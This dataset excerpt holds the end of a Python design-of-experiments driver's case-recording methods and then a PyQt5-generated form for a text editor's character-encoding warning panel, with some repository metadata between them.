Add a recorder to the driver.
Parameters
----------
recorder : CaseRecorder
A recorder instance.
"""
# keep track of recorders so we can flag them as parallel
# if we end up running in parallel
self._recorders.append(recorder)
super(DOEDriver, self).add_recorder(recorder)
def _setup_recording(self):
"""
Set up case recording.
"""
if MPI:
procs_per_model = self.options['procs_per_model']
for recorder in self._recorders:
recorder._parallel = True
# if SqliteRecorder, write cases only on procs up to the number
# of parallel DOEs (i.e. on the root procs for the cases)
if isinstance(recorder, SqliteRecorder):
if procs_per_model == 1:
recorder._record_on_proc = True
else:
size = self._comm.size // procs_per_model
if self._comm.rank < size:
recorder._record_on_proc = True
else:
recorder._record_on_proc = False
super(DOEDriver, self)._setup_recording()
def record_iteration(self):
"""
Record an iteration of the current Driver.
"""
if not self._rec_mgr._recorders:
return
# Get the data to record (collective calls that get across all ranks)
opts = self.recording_options
filt = self._filtered_vars_to_record
if opts['record_desvars']:
des_vars = self.get_design_var_values(driver_scaling=False, filter=filt['des'])
else:
des_vars = {}
if opts['record_objectives']:
obj_vars = self.get_objective_values(driver_scaling=False, filter=filt['obj'])
else:
obj_vars = {}
if opts['record_constraints']:
con_vars = self.get_constraint_values(driver_scaling=False, filter=filt['con'])
else:
con_vars = {}
if opts['record_responses']:
# res_vars = self.get_response_values(filter=filt['res']) # not really working yet
res_vars = {}
else:
res_vars = {}
model = self._problem.model
names = model._outputs._names
views = model._outputs._views
sys_vars = {name: views[name] for name in names if name in filt['sys']}
out_vars = des_vars
out_vars.update(res_vars)
out_vars.update(obj_vars)
out_vars.update(con_vars)
out_vars.update(sys_vars)
if self.recording_options['record_inputs']:
names = model._inputs._names
views = model._inputs._views
in_vars = {name: views[name] for name in names if name in filt['in']}
else:
in_vars = {}
data = {
'out': out_vars,
'in': in_vars
}
self._rec_mgr.record_iteration(self, data, self._metadata)
| 32.358663
| 99
| 0.558614
|
4a190f5c63f3bcbe6d90f33ace5a24b2da63fcf5
| 3,481
|
py
|
Python
|
pyqode/core/_forms/pnl_encoding_ui.py
|
SunChuquin/pyqode.core
|
edf29204446e3679701e74343288cf692eb07d86
|
[
"MIT"
] | 42
|
2018-05-02T07:07:27.000Z
|
2022-02-01T19:49:49.000Z
|
pyqode/core/_forms/pnl_encoding_ui.py
|
SunChuquin/pyqode.core
|
edf29204446e3679701e74343288cf692eb07d86
|
[
"MIT"
] | 65
|
2018-03-08T11:53:13.000Z
|
2018-09-17T09:00:09.000Z
|
Lib/site-packages/pyqode/core/_forms/pnl_encoding_ui.py
|
fochoao/cpython
|
3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
|
[
"bzip2-1.0.6",
"0BSD"
] | 24
|
2015-01-09T14:16:41.000Z
|
2021-12-06T15:11:22.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/colin/dev/pyQode/pyqode.core/forms/pnl_encoding.ui'
#
# Created by: PyQt5 UI code generator 5.5.1
#
# WARNING! All changes made in this file will be lost!
from pyqode.qt import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(964, 169)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(Form)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.lblDescription = QtWidgets.QLabel(Form)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lblDescription.sizePolicy().hasHeightForWidth())
self.lblDescription.setSizePolicy(sizePolicy)
self.lblDescription.setWordWrap(True)
self.lblDescription.setObjectName("lblDescription")
self.verticalLayout.addWidget(self.lblDescription)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtWidgets.QLabel(Form)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.comboBoxEncodings = EncodingsComboBox(Form)
self.comboBoxEncodings.setMinimumSize(QtCore.QSize(250, 0))
self.comboBoxEncodings.setEditable(False)
self.comboBoxEncodings.setObjectName("comboBoxEncodings")
self.horizontalLayout.addWidget(self.comboBoxEncodings)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout.setStretch(0, 1)
self.verticalLayout.setStretch(1, 1)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.pushButtonRetry = QtWidgets.QPushButton(Form)
self.pushButtonRetry.setObjectName("pushButtonRetry")
self.horizontalLayout_2.addWidget(self.pushButtonRetry)
self.pushButtonEdit = QtWidgets.QPushButton(Form)
self.pushButtonEdit.setObjectName("pushButtonEdit")
self.horizontalLayout_2.addWidget(self.pushButtonEdit)
self.pushButtonCancel = QtWidgets.QPushButton(Form)
self.pushButtonCancel.setObjectName("pushButtonCancel")
self.horizontalLayout_2.addWidget(self.pushButtonCancel)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_("Form"))
self.lblDescription.setText(_("<html><head/><body><p><span style=\" font-weight:600;\">%s</span></p><p><span style=\" font-size:9pt;\">The file you opened has some invalid characters. If you continue editing this file you could corrupt this document. You can also choose another character encoding and try again.</span></p></body></html>"))
self.label.setText(_("Character Encoding:"))
self.pushButtonRetry.setText(_("Retry"))
self.pushButtonEdit.setText(_("Edit Anyway"))
self.pushButtonCancel.setText(_("Cancel"))
from pyqode.core.widgets.encodings import EncodingsComboBox
| 52.742424
| 348
| 0.731399
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.